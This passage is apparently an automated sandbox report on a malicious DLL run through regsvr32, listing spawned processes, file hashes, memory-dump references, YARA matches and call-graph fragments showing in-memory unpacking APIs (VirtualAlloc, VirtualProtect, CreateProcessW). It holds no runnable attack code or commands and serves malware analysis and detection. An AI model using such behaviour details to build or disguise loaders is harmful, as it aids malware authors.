MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:20
Start time:04:21:54
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:21
Start time:04:22:01
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:23
Start time:04:22:13
Start date:14/05/2022
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff7338d0000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:28
Start time:04:22:44
Start date:14/05/2022
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:0x7ff678970000
File size:455656 bytes
MD5 hash:A267555174BFA53844371226F482B86B
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:29
Start time:04:22:45
Start date:14/05/2022
Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff647620000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language


Execution Graph

Execution Coverage: 10.7%
Dynamic/Decrypted Code Coverage: 2.5%
Signature Coverage: 16.1%
Total number of Nodes: 684
Total number of Limit Nodes: 6
execution_graph: flattened node/edge listing of the rendered call graph (684 nodes; root nodes at 7fffefb91ee7, c90000 and 7fffefb92290, with the c90000 path reaching VirtualAlloc, GetNativeSystemInfo, VirtualProtect and RtlAddFunctionTable, and the 7fffefb9xxxx paths covering CRT initialization, HeapCreate, IsDebuggerPresent and SetUnhandledExceptionFilter). The listing is truncated in the source and is not reproduced here.
calls 10531->10535 10544 7fffefb96a80 LeaveCriticalSection 10532->10544 10535->10532 10541->9915 10545 180021c3c 10546 180021c97 10545->10546 10549 180001bdc 10546->10549 10548 180021e38 10551 180001c82 10549->10551 10550 180001d21 CreateProcessW 10550->10548 10551->10550 10552 7fffefb92050 10555 7fffefb51000 10552->10555 10556 7fffefb5101e ExitProcess 10555->10556

Control-flow Graph
86->88 89 c9085d-c9085e 86->89 100 c907ae-c907d4 88->100 89->65 90->60 108 c9097f-c90981 92->108 109 c909a2-c909a4 92->109 105 c9096e-c90979 93->105 106 c90960-c9096c 93->106 107 c906bd-c906be 94->107 110 c9068c-c90690 95->110 111 c90680-c9068a 95->111 96->71 97->97 112 c90786 97->112 113 c90a38-c90a3e 98->113 101 c90a7b-c90a8e 99->101 102 c90a4c-c90a54 99->102 135 c90835-c90839 100->135 136 c907d6-c907d9 100->136 101->35 102->101 115 c90a56-c90a79 RtlAddFunctionTable 102->115 124 c908bb-c908c8 103->124 125 c908b3-c908b9 103->125 104->72 116 c909be-c909bf 105->116 106->116 107->78 117 c90989-c9098b 108->117 118 c90983-c90987 108->118 122 c909ac-c909bb 109->122 123 c909a6-c909aa 109->123 120 c90692-c906a3 110->120 121 c906a5-c906a9 110->121 119 c906b6-c906ba 111->119 112->86 113->99 114 c90a29-c90a35 113->114 114->113 115->101 130 c909c5-c909cb 116->130 117->109 128 c9098d-c9098f 117->128 118->116 119->107 120->119 121->107 129 c906ab-c906b3 121->129 122->116 123->116 132 c908ca-c908d1 124->132 133 c908d3-c908e5 124->133 131 c908ea-c908fe 125->131 137 c90999-c909a0 128->137 138 c90991-c90997 128->138 129->119 139 c909d9-c909e9 VirtualProtect 130->139 140 c909cd-c909d3 130->140 131->104 146 c90900-c90905 131->146 132->132 132->133 133->131 143 c9083b 135->143 144 c90844-c90850 135->144 141 c907db-c907e1 136->141 142 c907e3-c907f0 136->142 137->130 138->116 139->83 140->139 147 c90812-c9082c 141->147 148 c907fb-c9080d 142->148 149 c907f2-c907f9 142->149 143->144 144->100 150 c90856-c90857 144->150 146->103 147->135 152 c9082e-c90833 147->152 148->147 149->148 149->149 150->89 152->136
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243438412.0000000000C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c90000_regsvr32.jbxd
Similarity
• API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
• String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
• API String ID: 394283112-2517549848
• Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction ID: cd69c516c76a5471ab1842254e0cebf59a5a7ee5fd8670b37b9f8248c4a70d83
• Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
• Instruction Fuzzy Hash: B272D530618B488FDB19DF18C8896B9B7E1FF98305F20462DE89BD7211DB34DA46CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #C$(I$-:$Ekf$<W$Z$l$l
• API String ID: 0-464535774
• Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
• Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
• Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
• API String ID: 0-4168131144
• Opcode ID: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
• Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
• Opcode Fuzzy Hash: 30d22681d77451a804741155910a8214494d75842a214bfc255a7dbc84502ded
• Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: )|x$/Zb$/v|$OV4T$\$lA
• API String ID: 0-3528011396
• Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
• Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
• Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
• Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: $&.+$)O$.pN$F>9$t(/
• API String ID: 0-3036092626
• Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
• Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
• Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: :G$Q27$_5$yy8x$Mh
• API String ID: 0-3587547327
• Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
• Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
• Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
• Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: %'#$'1O"
                                                                                                                                • API String ID: 0-3508158491
                                                                                                                                • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                                                                                • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                                                                                • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: xDC
                                                                                                                                • API String ID: 0-90241050
                                                                                                                                • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                                                                                • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                                                                                • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB94110: HeapCreate.KERNELBASE(?,?,?,?,00007FFFEFB92169), ref: 00007FFFEFB94122
                                                                                                                                  • Part of subcall function 00007FFFEFB94110: HeapSetInformation.KERNEL32 ref: 00007FFFEFB9414C
                                                                                                                                • _RTC_Initialize.LIBCMT ref: 00007FFFEFB92184
                                                                                                                                • GetCommandLineA.KERNEL32 ref: 00007FFFEFB92189
                                                                                                                                  • Part of subcall function 00007FFFEFB93EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB9219B), ref: 00007FFFEFB93F1B
                                                                                                                                  • Part of subcall function 00007FFFEFB93EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB9219B), ref: 00007FFFEFB93F5B
                                                                                                                                  • Part of subcall function 00007FFFEFB93758: GetStartupInfoA.KERNEL32 ref: 00007FFFEFB9377D
                                                                                                                                • __setargv.LIBCMT ref: 00007FFFEFB921B2
                                                                                                                                • _cinit.LIBCMT ref: 00007FFFEFB921C6
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: FlsFree.KERNEL32(?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB92CA3
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB96A32
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: free.LIBCMT ref: 00007FFFEFB96A3B
                                                                                                                                  • Part of subcall function 00007FFFEFB92C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFB92217), ref: 00007FFFEFB96A5B
                                                                                                                                  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FFFEFB9224C
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB92260
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9226F
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1549890855-0
                                                                                                                                • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                • Instruction ID: 65fd415d7e10d2997173d958b7f9083a7ff3a4e5812450233de69db605838476
                                                                                                                                • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                                • Instruction Fuzzy Hash: C6311820F0D61381FAA877B5990237E31E96F55770F248134DA2E856F7EE2CF8648223
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • _getptd.LIBCMT ref: 00007FFFEFB94CF3
                                                                                                                                  • Part of subcall function 00007FFFEFB9497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFFEFB94D0E,?,?,?,?,?,00007FFFEFB94EE3), ref: 00007FFFEFB949A6
                                                                                                                                  • Part of subcall function 00007FFFEFB9309C: Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94D7F
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: HeapFree.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9303A
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: _errno.LIBCMT ref: 00007FFFEFB93044
                                                                                                                                  • Part of subcall function 00007FFFEFB93024: GetLastError.KERNEL32(?,?,00000000,00007FFFEFB92DDC,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9304C
                                                                                                                                • _lock.LIBCMT ref: 00007FFFEFB94DB7
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94E67
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB94E97
                                                                                                                                • _errno.LIBCMT ref: 00007FFFEFB94E9C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1264244385-0
                                                                                                                                • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                • Instruction ID: 02c04e822c3bbe073b41f1a1c21a334b3669f95eac36baa868096f56654f0ed0
                                                                                                                                • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                                                                                • Instruction Fuzzy Hash: 1D516C22A08A8386E7589B65A440379B7E6FF84B64F14C236DA5E4B3F5DF3CE4458702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 502529563-0
                                                                                                                                • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                • Instruction ID: df8da3acf5cff88c58eee8e1efc71b7c12fd892779a43d62db970be13d5271f2
                                                                                                                                • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                                                                                • Instruction Fuzzy Hash: C0113C25A0D64381FA55ABA1E81137936E6EF84BF0F544630EA1E57BF6DE3CE4408713
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                                                                                • String ID: vb4vcW2kAW3Twaz?30
                                                                                                                                • API String ID: 254689257-4179232793
                                                                                                                                • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                • Instruction ID: 6f1ab65e7d85fb5806362f55c97724e2e5623db430e97423817764091f5a6792
                                                                                                                                • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                                                                                • Instruction Fuzzy Hash: 2B210532A0CEC686E330CB14E4543AA77E9FB88754F504535CA8D877B9DF7DA5059B01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 00007FFFEFB936F0: _initp_misc_winsig.LIBCMT ref: 00007FFFEFB93729
  • Part of subcall function 00007FFFEFB936F0: EncodePointer.KERNEL32(?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB93745
• FlsAlloc.KERNEL32(?,?,?,00007FFFEFB92179), ref: 00007FFFEFB92FBB
  • Part of subcall function 00007FFFEFB93108: Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
• FlsSetValue.KERNEL32(?,?,?,00007FFFEFB92179), ref: 00007FFFEFB92FEC
• GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB93000
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
• String ID:
• API String ID: 54287522-0
• Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
• Instruction ID: 631e1396b2a9a2058970042439293732054d17041d702bb57cbd525706eda3ea
• Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
• Instruction Fuzzy Hash: E8013160F09A0345FB64ABB9984537A72E95F45770F188234D53D862F2EF2CA495D223
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateProcess
• String ID: :}
• API String ID: 963392458-2902022129
• Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
• Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
• Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
